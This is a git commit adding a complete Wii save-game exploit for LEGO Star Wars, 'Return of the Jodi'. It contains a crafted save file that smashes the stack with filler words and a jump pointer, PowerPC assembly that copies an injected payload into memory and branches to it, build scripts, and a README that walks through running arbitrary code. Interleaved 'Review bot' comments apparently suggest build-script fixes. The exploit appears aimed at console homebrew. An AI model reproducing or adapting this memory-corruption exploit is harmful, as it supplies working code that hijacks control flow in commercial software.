LEGO Star Wars by roto

This commit is contained in:
Bernhard Urban 2011-02-02 03:14:14 +01:00 committed by Segher Boessenkool
parent da886e2a72
commit c58aa93d1e
23 changed files with 372 additions and 0 deletions


@ -53,6 +53,7 @@ all: FORCE .version
$(Q)$(MAKE) -C twilight
$(Q)$(MAKE) -C lego
$(Q)$(MAKE) -C batman
$(Q)$(MAKE) -C lsw
FORCE:
@ -62,3 +63,4 @@ clean:
$(MAKE) -C twilight clean
$(MAKE) -C lego clean
$(MAKE) -C batman clean
$(MAKE) -C lsw clean

5
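--- /dev/null
+++ b/lsw/.gitignore
@@ -0,0 +1,5 @@
+rlg?.bin
+FILE_V28
+exploit.bin
+exploit.elf
+title.bin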

127
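--- /dev/null
+++ b/lsw/Makefile
@@ -0,0 +1,127 @@
+# Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
+# Copyright 2011 roto <roto@mozy.org>
+# Copyright 2011 Bernhard Urban <lewurm@gmail.com>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+# Configuration:
+# What toolchain prefix should we use
+CROSS ?= broadway-
+# Where are the tools (http://git.infradead.org/users/segher/wii.git)
+TOOLS ?= $(HOME)/wii/segher
+# End of configuration.
+# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
+ifeq ($(origin CC), default)
+CC := $(CROSS)gcc -m32
+endif
+ifeq ($(origin LD), default)
+LD := $(CROSS)ld
+endif
+OBJCOPY ?= $(CROSS)objcopy
+# The compiler flags we need.
+CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750
+# Build with "V=1" to see the commands executed; be quiet otherwise.
+ifeq ($(V),1)
+Q :=
+else
+Q := @
+MAKEFLAGS += --no-print-directory
+endif
+targets := rlge.bin rlgp.bin rlgj.bin
+ppms := $(targets:%.bin=%-icon.ppm) generic-banner.ppm
+assets := title.bin $(ppms)
+loader := ../loader/loader.bin
+titleid = $(shell perl titleid.pl $(1))
+define twintig
+D=$(call titleid,$(1)); \
+$(TOOLS)/twintig $$D $@ toc-$1
+endef
+all: $(targets)
+$(targets): %.bin: toc-% FILE_V28 $(assets)
+@echo " TWINTIG $@"
+$(Q)$(call twintig,$*)
+FILE_V28: head.bin exploit.bin $(loader)
+@echo " LEGOSTACK $@"
+$(Q)./pack.sh $@ $^
+$(Q)$(TOOLS)/lego-cksum $@ 32380 #32328 #32688
+head.bin: head.elf
+@echo " OBJCOPY $@"
+$(Q)$(OBJCOPY) -Obinary $< $@
+exploit.bin: exploit.elf
+@echo " OBJCOPY $@"
+$(Q)$(OBJCOPY) -Obinary $< $@
+exploit.elf: lego.lds exploit.o
+@echo " LINK $@"
+$(Q)$(LD) -T $^ -o $@
+head.elf: head.o
+@echo " LINK $@"
+$(Q)$(LD) -e 0 $< -o $@
+exploit.o: exploit.s
+@echo " ASSEMBLE $@"
+$(Q)$(CC) $(CFLAGS) -c $< -o $@
+head.o: head.s head.b exploit2.s exploit.bin
+@echo " ASSEMBLE $@"
+$(Q)$(CC) $(CFLAGS) \
+-Wa,--defsym,exploitlen=$(shell wc -c exploit.bin | awk '{ print $$1 }') \
+-c $< -o $@
+title.bin: ../.version
+@echo " TITLEBIN $@"
+$(Q)perl make-title-bin.pl > $@
+../.version: FORCE
+$(Q)$(MAKE) -C .. .version
+$(ppms): %.ppm: %.png
+@echo " PPM $@"
+$(Q)convert $< $@
+zero16k:
+$(Q)dd if=/dev/zero bs=18256 count=1 2>/dev/null > $@
+#17332
+#16384
+FAILURE:
+$(Q)echo FAILURE > $@
+$(loader): FORCE
+$(Q)$(MAKE) -C ../loader
+FORCE:
+clean:
+-rm -f $(targets) FILE_V28
+-rm -f exploit.bin exploit.elf exploit.o
+-rm -f head.bin head.elf head.o
+-rm -f title.bin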
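Review bot: Two recipes can leave a stale-but-newer target behind on failure: `FILE_V28` runs `pack.sh` and then `lego-cksum`, so a failing checksum step leaves an unchecksummed `FILE_V28` that looks up to date, and `title.bin` is created by the shell redirection before `make-title-bin.pl` has produced anything. Adding `.DELETE_ON_ERROR:` near the top of the file covers both, and `all` and `clean` should be declared with `.PHONY: all clean`, since the `FORCE` idiom only protects the version and loader rules. The `zero16k` and `FAILURE` targets are not referenced by any other rule here and, together with the trailing `#32328 #32688` and `#17332`/`#16384` comments, read as leftover debugging that should either be removed or get a comment explaining why they are kept. The `-` prefix on the `rm -f` lines in `clean` is redundant because `-f` already tolerates missing files.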

41
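--- /dev/null
+++ b/lsw/README
@@ -0,0 +1,41 @@
+Copyright 2011 roto <roto@mozy.org>
+Copyright 2011 Bernhard Urban <lewurm@gmail.com>
+Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
+Copyright 2008 Haxx Enterprises <bushing@gmail.com>
+Copyright 2008 Hector Martin "marcan" <marcan@marcansoft.com>
+Copyright 2003-2004 Felix Domke <tmbinc@elitedvb.net>
+This code is licensed to you under the terms of the GNU GPL, version 2;
+see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+Console font created by Freddy Leitner [www.dreamer.de], based on
+the Droid Sans Mono font [www.droidfonts.com].
+--
+This is the Lego Star Wars exploit known as "Return of the Jodi". This exploit
+works on all versions of the game (including 1.01) in all regions that are
+currently known to have a release.
+Instructions:
+1. Copy the save to your SD card.
+2. Put a "boot.elf" (such as the HackMii installer or Homebrew Channel) into the
+ROOT of your SD card (not into any folder).
+3. Copy the save to your Wii system, make sure you have a save for this game
+already on your system, otherwise you won't be able to copy the exploit
+save over.
+4. Start up the game, load the first save slot (on the left, at 0.0%)
+5. As soon as the level loads, run to the right and you'll see two characters
+floating. Run to the area in front of them and you'll see "Return of Jodi"
+show up, press the "A" button on your Wiimote and your boot.elf will run!
+Credits:
+Team Twiizers - Original LIJ release, source, savezelda (and many other things).
+roto - Developing and testing this exploit.
+lewurm - Cleaning up, fixing bugs, testing.
+drmr - Awesome banner/icons!
+Thanks:
+Everyone!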

38
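--- /dev/null
+++ b/lsw/exploit.s
@@ -0,0 +1,38 @@
+# Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
+# Copyright 2011 roto <roto@mozy.org>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+.section .start,"ax"
+start:
+# Set up a stack frame.
+lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
+# Stop audio and video.
+lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl
+lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl
+# Move code into place; a generous 32kB, starting at 64kB in
+# the save file.
+# Load address where we're going to move our exploit code to
+# (0x90000020) into R03
+lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
+# Load the address for the beginning of our save data
+# (0x91168ea0) into R04
+lis 4,save@h ; ori 4,4,save@l ; addi 4,4,-4
+addis 4,4,1 ; addi 4,4,end-start
+li 0,0x2000 ; mtctr 0
+0: lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b
+# Sync caches on it.
+li 0,0x0400 ; mtctr 0 ; mr 5,3
+0: dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b
+sync ; isync
+# Jump to 0x90000020 and go for it!
+mtctr 3 ; bctr
+end: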

57
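--- /dev/null
+++ b/lsw/exploit2.s
@@ -0,0 +1,57 @@
+# Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
+# Copyright 2011 roto <roto@mozy.org>
+# Copyright 2011 Bernhard Urban <lewurm@gmail.com>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+bptr = 0x91178ea0
+save = 0x91177f40
+main = 0x90000020
+audio_stop_usa = 0x8038ce9c
+video_stop_usa = 0x8039971c
+audio_stop_eur = 0x8038cfec
+video_stop_eur = 0x80399708
+audio_stop_data = 0x9421fff0 # stwu 1,-16(1)
+video_stop_data = 0x9421ffe0 # stwu 1,-32(1)
+# Set up a stack frame.
+lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
+# Stop audio.
+lis 10,audio_stop_data@h ; ori 10,10,audio_stop_data@l
+lis 3,audio_stop_usa@h ; ori 3,3,audio_stop_usa@l; lwz 5,0(3)
+cmpw 5,10 ; beq execa
+lis 3,audio_stop_eur@h ; ori 3,3,audio_stop_eur@l
+execa:
+mtctr 3 ; bctrl
+# Stop video.
+lis 10,video_stop_data@h ; ori 10,10,video_stop_data@l
+lis 3,video_stop_usa@h ; ori 3,3,video_stop_usa@l; lwz 5,0(3)
+cmpw 5,10 ; beq execv
+lis 3,video_stop_eur@h ; ori 3,3,video_stop_eur@l
+execv:
+mtctr 3 ; bctrl
+# Move code into place; a generous 32kB, starting at 64kB in
+# the save file.
+lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
+lis 4,save@h ; ori 4,4,save@l ; addi 4,4,-4
+addis 4,4,1 ; addi 4,4,exploitlen # offset for exploit.bin
+li 0,0x2000 ; mtctr 0
+loop1:
+lwzu 0,4(4) ; stwu 0,4(5) ; bdnz loop1
+# Sync caches on it.
+li 0,0x0400 ; mtctr 0 ; mr 5,3
+loop2:
+dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz loop2
+sync ; isync
+# Go for it!
+mtctr 3 ; bctr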

BIN
lsw/generic-banner.png Normal file

Binary file not shown.


BIN
lsw/generic-banner.ppm Normal file

Binary file not shown.

BIN
lsw/head.b Executable file

Binary file not shown.

43
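--- /dev/null
+++ b/lsw/head.s
@@ -0,0 +1,43 @@
+# Copyright 2011 roto <roto@mozy.org>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+bptr = 0x91178ea0
+0:
+# Part of the savefile
+.long 0x00000001, 0x00000000, 0x00000000, 0x00000000
+.long 0x00000000, 0x00000013, 0x0000000d, 0x00000000
+.long 0x00000002, 0x00000000, 0x000007db, 0x00000000
+.long 0x00000001, 0x0000029e, 0x0000019d, 0x00050000
+.long 0x01010008, 0x060a0100, 0x00000001, 0x00000000
+.long 0x00000000, 0x00000000, 0x00000000, 0x00000000
+# Filler
+.fill 0xF60 - (. - 0b)
+exploitv2:
+# This is necessary for the 2nd exploit (first release) of LSW
+.include "exploit2.s"
+# More filler
+.fill 0x7860 - (. - 0b)
+# Insert rest of the save
+.incbin "head.b"
+# Smack the stack.
+.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+.long 0x11111111
+# Depending on the version we jump now to exploit.s or to "exploit2v:"
+.long 0x11111111, bptr, 0x11111111, 0x11111111
+.fill 0x10000 - (. - 0b)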
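Review bot: The comment on the second-to-last line names a label `exploit2v:` that does not exist in this file; the label defined just before the `.include "exploit2.s"` line is `exploitv2:`. Suggest `# Depending on the version we jump now to exploit.s or to "exploitv2:"` so the comment matches the actual symbol. `bptr = 0x91178ea0` is also defined both here and in the included `exploit2.s`; GAS presumably accepts the repeated assignment of the same value, but keeping a single definition would avoid the two drifting apart.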

26
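--- /dev/null
+++ b/lsw/lego.lds
@@ -0,0 +1,26 @@
+/* Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
+This code is licensed to you under the terms of the GNU GPL, version 2;
+see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+SECTIONS {
+audio_stop = 0x8038ce90;
+video_stop = 0x80399708;
+save = 0x91168ea0;
+bptr = 0x91178ea0;
+main = 0x90000020;
+.twilight save :
+{
+rli*.o(.start)
+*(.text)
+*(.rodata .rodata.*)
+*(.data)
+*(.bss)
+/* . = 0x0a94; */
+}
+}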
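Review bot: The input-section pattern `rli*.o(.start)` inside `.twilight` does not match any object this directory links: the Makefile's `exploit.elf: lego.lds exploit.o` rule feeds only `exploit.o`, and that file places its code in `.section .start`. As written, `.start` is an orphan section whose placement relative to `save` depends on ld's orphan handling, presumably landing right after the otherwise empty `.twilight` output section; `exploit.o(.start)` or `*(.start)` would make the intended layout explicit rather than accidental. The commented-out `/* . = 0x0a94; */` is dead and can be dropped.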

16
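--- /dev/null
+++ b/lsw/make-title-bin.pl
@@ -0,0 +1,16 @@
+#!/usr/bin/perl
+sub printline {
+my $x = shift;
+chomp $x;
+$x .= "\0" x 32;
+$x = substr $x, 0, 32;
+$x =~ s/(.)/\0$1/g;
+print $x;
+}
+$name = "Return of the Jodi";
+$version = `cat ../.version`;
+printline $name;
+printline $version;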
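Review bot: `$version` is read by shelling out to `cat ../.version` in backticks, which spawns a subprocess and swallows a missing file into an empty string, where `open my $fh, '<', '../.version' or die "cannot read ../.version: $!"; my $version = <$fh>;` would fail the build loudly. The script also runs without `use strict; use warnings;`, so `$name` and `$version` are undeclared globals. `printline` deserves a short comment since its behavior is not obvious: it pads or silently truncates to 32 characters and then widens each character by prefixing a NUL byte, which is only correct for ASCII input, e.g. `# ASCII only: pad/truncate to 32 chars, then widen to 16-bit big-endian by prefixing NUL`.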

3
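--- /dev/null
+++ b/lsw/pack.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+TARGET=$1; shift
+cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET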
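Review bot: `cat $* /dev/zero` and `> $TARGET` on the last line are unquoted, so any path containing whitespace or glob characters is split or expanded; `cat "$@" /dev/zero | dd bs=1024 count=128 2>/dev/null > "$TARGET"` is the safe form. Because the pipeline's exit status is dd's, a missing input file only prints a cat error while the script still exits 0, so the Makefile's `FILE_V28` rule would succeed with a save padded from the remaining inputs; `set -o pipefail` at the top would surface that. `dd count=128` likewise silently truncates when the inputs together exceed 128 KiB, which is worth checking before packing.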

BIN
lsw/rlge-icon.png Normal file

Binary file not shown.


BIN
lsw/rlge-icon.ppm Normal file

Binary file not shown.

BIN
lsw/rlgj-icon.png Normal file

Binary file not shown.


BIN
lsw/rlgj-icon.ppm Normal file

Binary file not shown.

BIN
lsw/rlgp-icon.png Normal file

Binary file not shown.


BIN
lsw/rlgp-icon.ppm Normal file

Binary file not shown.

2
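--- /dev/null
+++ b/lsw/titleid.pl
@@ -0,0 +1,2 @@
+#!/usr/bin/perl
+print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0];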
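Review bot: When `$ARGV[0]` is missing the script prints only `00010000`, so a bad invocation from the Makefile's `titleid` variable yields a truncated id that is passed on to twintig instead of an error; a guard such as `die "usage: titleid.pl <game-id>\n" unless defined $ARGV[0];` before the `print` would fail the build instead. A one-line comment stating that the output is the fixed `00010000` prefix followed by the hex of the upper-cased id bytes would also help, since `ord uc` relies on the implicit `$_` and is easy to misread.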

4
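--- /dev/null
+++ b/lsw/toc-rlge
@@ -0,0 +1,4 @@
+title.bin
+generic-banner.ppm
+rlge-icon.ppm
+FILE_V28 FILE_V28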

4
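--- /dev/null
+++ b/lsw/toc-rlgj
@@ -0,0 +1,4 @@
+title.bin
+generic-banner.ppm
+rlgj-icon.ppm
+FILE_V28 FILE_V28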

4
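--- /dev/null
+++ b/lsw/toc-rlgp
@@ -0,0 +1,4 @@
+title.bin
+generic-banner.ppm
+rlgp-icon.ppm
+FILE_V28 FILE_V28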